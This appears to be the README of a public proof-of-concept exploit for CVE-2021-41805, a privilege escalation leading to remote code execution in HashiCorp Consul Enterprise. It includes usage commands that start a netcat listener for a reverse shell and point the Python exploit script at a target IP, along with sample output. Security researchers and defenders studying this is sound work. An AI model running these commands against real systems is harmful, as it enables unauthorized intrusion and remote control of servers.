
A proof-of-concept for CVE-2021-41805 which is a vulnerability in HashiCorp Consul Enterprise allowing for Remote Code Execution (RCE) with escalated privileges.
[!WARNING] LEGAL DISCLAIMER: This tool is STRICTLY for EDUCATIONAL PURPOSES ONLY! Usage of this tool for attacking targets without prior mutual consent is ILLEGAL. It is the user's responsibility to obey all laws that apply whilst using this tool. The developer of this tool assumes no liability and is not responsible for any misuse or damage caused by this program.
An ACL token (with the default operator:write permissions) in one namespace can be used for unintended privilege escalation in a different namespace. This can be abused to gain Remote Code Execution (RCE) with escalated privileges.
git clone https://github.com/acfirthh/CVE-2021-41805.gitcd CVE-2021-41805nc -nvlp <LISTENER_PORT>python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]
Running the exploit with the basic arguments: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [Use SSL]) will give basic output like:
[*] The PUT request was made successfully. Check your listener...
Running the exploit with the basic arguments plus -v [VERBOSE] will give verbose output:

If an error occurs when the exploit is run and the -v argument is specified, the output will be something like:
